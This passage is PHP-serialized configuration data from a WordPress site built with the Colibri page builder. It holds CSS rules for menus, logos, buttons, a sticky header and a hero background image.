unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:5;a:3:{s:7:\"desktop\";s:557:\"#colibri .style-5-image {\n max-height: 70px;\n}\n#colibri .style-5 .logo-text {\n color: #FFFFFF;\n}\n#colibri .style-5 a,#colibri .style-5 .logo-text {\n color: #ffffff;\n text-decoration: none;\n font-size: 24px;\n}\n#colibri .h-navigation_sticky .style-5-image,#colibri .h-navigation_sticky.style-5-image {\n max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-5 a,#colibri .h-navigation_sticky .style-5 .logo-text,#colibri .h-navigation_sticky.style-5 a,#colibri .h-navigation_sticky.style-5 .logo-text {\n color: #000000;\n text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:6;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-6 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:7;a:3:{s:7:\"desktop\";s:38:\"#colibri .style-7 {\n height: 50px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:8;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-8 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:9;a:3:{s:7:\"desktop\";s:8521:\"#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > svg,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > .arrow-wrapper {\n color: rgb(255, 255, 255);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n color: rgb(255, 255, 255);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > a > svg,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > a > .arrow-wrapper {\n padding-right: 5px;\n padding-left: 5px;\n color: black;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n padding-right: 5px;\n padding-left: 5px;\n color: black;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li > ul::before {\n height: 0px;\n width: 100% ;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li > ul {\n margin-top: 0px;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu.solid-active-item > li::after,#colibri .style-9 \n ul.colibri-menu.solid-active-item > li::before {\n background-color: white;\n background-image: none;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 0%;\n border-top-right-radius: 0%;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 0%;\n border-bottom-right-radius: 0%;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .style-9 \n ul.colibri-menu.bordered-active-item > li::before {\n background-color: rgb(166, 220, 244);\n background-image: none;\n height: 3px;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n font-size: 14px;\n color: rgb(37, 41, 42);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover > a {\n color: rgb(255, 255, 255);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover > a,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover > a {\n color: rgb(255, 255, 255);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n font-size: 14px;\n color: rgb(255, 255, 255);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul li {\n padding-top: 10px;\n padding-right: 20px;\n padding-bottom: 10px;\n padding-left: 20px;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgba(128,128,128,.2);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-style: none;\n background-color: rgb(255, 255, 255);\n background-image: none;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n background-color: #03a9f4;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n background-color: #03a9f4;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover {\n padding-top: 10px;\n padding-right: 20px;\n padding-bottom: 10px;\n padding-left: 20px;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgba(128,128,128,.2);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-style: none;\n background-color: #03a9f4;\n background-image: none;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul {\n background-color: #ffffff;\n background-image: none;\n margin-right: 5px;\n margin-left: 5px;\n box-shadow: 0px 0px 5px 2px rgba(0, 0, 0, 0.04) ;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li > a {\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 14px;\n line-height: 1.5em;\n letter-spacing: 0px;\n color: #FFFFFF;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: rgb(166, 220, 244);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: rgb(166, 220, 244);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 14px;\n line-height: 1.5em;\n letter-spacing: 0px;\n color: rgb(166, 220, 244);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li {\n margin-top: 0px;\n margin-right: 20px;\n margin-bottom: 0px;\n margin-left: 20px;\n padding-top: 10px;\n padding-right: 0px;\n padding-bottom: 10px;\n padding-left: 0px;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover {\n margin-top: 0px;\n margin-right: 20px;\n margin-bottom: 0px;\n margin-left: 20px;\n padding-top: 10px;\n padding-right: 0px;\n padding-bottom: 10px;\n padding-left: 0px;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu {\n justify-content: flex-end;\n}\n#colibri .h-navigation_sticky .style-9 > div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky .style-9 \n ul.colibri-menu.bordered-active-item > li::before,#colibri .h-navigation_sticky.style-9 > div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky.style-9 \n ul.colibri-menu.bordered-active-item > li::before {\n background-color: #03a9f4;\n background-image: none;\n}\n#colibri .h-navigation_sticky .style-9 > div > .colibri-menu-container > ul.colibri-menu > li > a,#colibri .h-navigation_sticky.style-9 > div > .colibri-menu-container > ul.colibri-menu > li > a {\n color: rgb(2, 110, 159);\n}\n#colibri .h-navigation_sticky .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a,#colibri .h-navigation_sticky.style-9 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-9 > div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a,#colibri .h-navigation_sticky.style-9 > div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky.style-9 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover,#colibri .h-navigation_sticky.style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky.style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n color: #03a9f4;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:10;a:3:{s:7:\"desktop\";s:928:\"#colibri .style-10-offscreen {\n background-color: #222B34;\n background-image: none;\n width: 300px !important;\n}\n#colibri .style-10-offscreenOverlay {\n background-color: rgba(0,0,0,0.5);\n background-image: none;\n}\n#colibri .style-10 .h-hamburger-icon {\n background-color: rgba(0, 0, 0, 0.1);\n background-image: none;\n border-top-width: 0px;\n border-top-color: black;\n border-top-style: solid;\n border-top-left-radius: 100%;\n border-top-right-radius: 100%;\n border-right-width: 0px;\n border-right-color: black;\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: black;\n border-bottom-style: solid;\n border-bottom-left-radius: 100%;\n border-bottom-right-radius: 100%;\n border-left-width: 0px;\n border-left-color: black;\n border-left-style: solid;\n fill: white;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n width: 24px;\n height: 24px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:11;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:12;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:13;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-13 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:14;a:3:{s:7:\"desktop\";s:496:\"#colibri .style-14-image {\n max-height: 70px;\n}\n#colibri .style-14 a,#colibri .style-14 .logo-text {\n color: #ffffff;\n text-decoration: none;\n}\n#colibri .h-navigation_sticky .style-14-image,#colibri .h-navigation_sticky.style-14-image {\n max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-14 a,#colibri .h-navigation_sticky .style-14 .logo-text,#colibri .h-navigation_sticky.style-14 a,#colibri .h-navigation_sticky.style-14 .logo-text {\n color: #000000;\n text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:15;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:16;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-16 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:17;a:3:{s:7:\"desktop\";s:3929:\"#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > svg,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > .arrow-wrapper {\n color: white;\n padding-right: 20px;\n padding-left: 20px;\n}\n#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n color: white;\n padding-right: 20px;\n padding-left: 20px;\n}\n#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > a > svg,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > a > .arrow-wrapper {\n padding-right: 20px;\n padding-left: 20px;\n color: black;\n}\n#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n padding-right: 20px;\n padding-left: 20px;\n color: black;\n}\n#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n font-size: 14px;\n color: white;\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n}\n#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n font-size: 14px;\n color: white;\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n}\n#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu > li > a {\n font-size: 14px;\n color: white;\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n}\n#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n font-size: 14px;\n color: white;\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:18;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:19;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:20;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:21;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:22;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:23;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:24;a:3:{s:7:\"desktop\";s:692:\"#colibri .style-24 {\n height: auto;\n min-height: unset;\n color: #FFFFFF;\n background-color: #03a9f4;\n background-position: center center;\n background-size: cover;\n background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/header-scaled.jpg\");\n background-attachment: scroll;\n background-repeat: no-repeat;\n padding-top: 200px;\n padding-bottom: 200px;\n}\n#colibri .style-24 h1 {\n color: #FFFFFF;\n}\n#colibri .style-24 h2 {\n color: #FFFFFF;\n}\n#colibri .style-24 h3 {\n color: #FFFFFF;\n}\n#colibri .style-24 h4 {\n color: #FFFFFF;\n}\n#colibri .style-24 h5 {\n color: #FFFFFF;\n}\n#colibri .style-24 h6 {\n color: #FFFFFF;\n}\n#colibri .style-24 p {\n color: #FFFFFF;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:25;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:26;a:3:{s:7:\"desktop\";s:386:\"#colibri .style-26-outer {\n width: 80% ;\n flex: 0 0 auto;\n -ms-flex: 0 0 auto;\n}\n#colibri .style-26 {\n text-align: center;\n height: auto;\n min-height: unset;\n border-top-width: 0px;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:27;a:3:{s:7:\"desktop\";s:352:\"#colibri .style-27 p,#colibri .style-27 h1,#colibri .style-27 h2,#colibri .style-27 h3,#colibri .style-27 h4,#colibri .style-27 h5,#colibri .style-27 h6 {\n font-weight: 600;\n text-align: center;\n}\n#colibri .style-27 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:28;a:3:{s:7:\"desktop\";s:105:\"#colibri .style-28 ul {\n list-style-type: disc;\n}\n#colibri .style-28 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:29;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:30;a:3:{s:7:\"desktop\";s:1290:\"#colibri .style-30-icon {\n width: 14px;\n height: 14px;\n margin-right: 10px;\n margin-left: 0px;\n}\n#colibri .style-30 {\n background-color: #03a9f4;\n background-image: none;\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 14px;\n line-height: 1em;\n letter-spacing: 1px;\n color: white;\n border-top-width: 2px;\n border-top-color: #03a9f4;\n border-top-style: solid;\n border-top-left-radius: 56px;\n border-top-right-radius: 56px;\n border-right-width: 2px;\n border-right-color: #03a9f4;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #03a9f4;\n border-bottom-style: solid;\n border-bottom-left-radius: 56px;\n border-bottom-right-radius: 56px;\n border-left-width: 2px;\n border-left-color: #03a9f4;\n border-left-style: solid;\n padding-top: 15px;\n padding-right: 30px;\n padding-bottom: 15px;\n padding-left: 30px;\n text-align: center;\n}\n#colibri .style-30:hover,#colibri .style-30:focus {\n background-color: rgb(2, 110, 159);\n border-top-color: rgb(2, 110, 159);\n border-right-color: rgb(2, 110, 159);\n border-bottom-color: rgb(2, 110, 159);\n border-left-color: rgb(2, 110, 159);\n}\n#colibri .style-30:active .style-30-icon {\n width: 14px;\n height: 14px;\n margin-right: 10px;\n margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:31;a:3:{s:7:\"desktop\";s:1259:\"#colibri .style-31-icon {\n width: 14px;\n height: 14px;\n margin-right: 10px;\n margin-left: 0px;\n}\n#colibri .style-31 {\n background-color: transparent;\n background-image: none;\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 14px;\n line-height: 1em;\n letter-spacing: 1px;\n color: white;\n border-top-width: 2px;\n border-top-color: white;\n border-top-style: solid;\n border-top-left-radius: 56px;\n border-top-right-radius: 56px;\n border-right-width: 2px;\n border-right-color: white;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: white;\n border-bottom-style: solid;\n border-bottom-left-radius: 56px;\n border-bottom-right-radius: 56px;\n border-left-width: 2px;\n border-left-color: white;\n border-left-style: solid;\n padding-top: 15px;\n padding-right: 30px;\n padding-bottom: 15px;\n padding-left: 30px;\n text-align: center;\n}\n#colibri .style-31:hover,#colibri .style-31:focus {\n background-color: rgba(255, 255, 255, 0.25);\n border-top-color: #FFFFFF;\n border-right-color: #FFFFFF;\n border-bottom-color: #FFFFFF;\n border-left-color: #FFFFFF;\n}\n#colibri .style-31:active .style-31-icon {\n width: 14px;\n height: 14px;\n margin-right: 10px;\n margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:32;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-32 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:33;a:3:{s:7:\"desktop\";s:730:\"#colibri .style-33-image {\n opacity: 1;\n}\n#colibri .style-33-overlay {\n background-color: unset;\n background-image: none;\n}\n#colibri .style-33-caption {\n margin-top: 10px;\n}\n#colibri .style-33-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:34;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:35;a:3:{s:7:\"desktop\";s:431:\"#colibri .style-35 {\n animation-duration: 0.5s;\n padding-top: 20px;\n padding-right: 15px;\n padding-bottom: 20px;\n padding-left: 15px;\n background-color: transparent;\n background-image: none;\n}\n#colibri .h-navigation_sticky .style-35,#colibri .h-navigation_sticky.style-35 {\n background-color: #ffffff;\n background-image: none;\n padding-top: 10px;\n padding-bottom: 10px;\n box-shadow: 0px 0px 4px 0px rgba(0,0,0,0.5) ;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:192:\"#colibri .style-35 {\n padding-top: 0px;\n padding-bottom: 0px;\n}\n#colibri .h-navigation_sticky .style-35,#colibri .h-navigation_sticky.style-35 {\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";}i:36;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:37;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-37 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:38;a:3:{s:7:\"desktop\";s:567:\"#colibri .style-38-image {\n max-height: 70px;\n}\n#colibri .style-38 .logo-text {\n color: #f6f8fa;\n}\n#colibri .style-38 a,#colibri .style-38 .logo-text {\n color: #ffffff;\n text-decoration: none;\n font-size: 24px;\n}\n#colibri .h-navigation_sticky .style-38-image,#colibri .h-navigation_sticky.style-38-image {\n max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-38 a,#colibri .h-navigation_sticky .style-38 .logo-text,#colibri .h-navigation_sticky.style-38 a,#colibri .h-navigation_sticky.style-38 .logo-text {\n color: #000000;\n text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:39;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-39 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:40;a:3:{s:7:\"desktop\";s:39:\"#colibri .style-40 {\n height: 50px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:41;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-41 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:42;a:3:{s:7:\"desktop\";s:8573:\"#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > svg,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > .arrow-wrapper {\n color: rgb(255, 255, 255);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n color: rgb(255, 255, 255);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > a > svg,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > a > .arrow-wrapper {\n padding-right: 5px;\n padding-left: 5px;\n color: black;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n padding-right: 5px;\n padding-left: 5px;\n color: black;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li > ul::before {\n height: 0px;\n width: 100% ;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li > ul {\n margin-top: 0px;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu.solid-active-item > li::after,#colibri .style-42 \n ul.colibri-menu.solid-active-item > li::before {\n background-color: white;\n background-image: none;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 0%;\n border-top-right-radius: 0%;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 0%;\n border-bottom-right-radius: 0%;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .style-42 \n ul.colibri-menu.bordered-active-item > li::before {\n background-color: rgb(81, 105, 207);\n background-image: none;\n height: 3px;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n font-size: 14px;\n color: rgb(60, 65, 84);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover > a {\n color: rgb(255, 255, 255);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover > a,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover > a {\n color: rgb(255, 255, 255);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n font-size: 14px;\n color: rgb(255, 255, 255);\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul li {\n padding-top: 10px;\n padding-right: 20px;\n padding-bottom: 10px;\n padding-left: 20px;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgba(128,128,128,.2);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-style: none;\n background-color: rgb(255, 255, 255);\n background-image: none;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n background-color: #303e7a;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n background-color: #303e7a;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item,#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover {\n padding-top: 10px;\n padding-right: 20px;\n padding-bottom: 10px;\n padding-left: 20px;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgba(128,128,128,.2);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-style: none;\n background-color: #303e7a;\n background-image: none;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu li > ul {\n background-color: #ffffff;\n background-image: none;\n margin-right: 5px;\n margin-left: 5px;\n 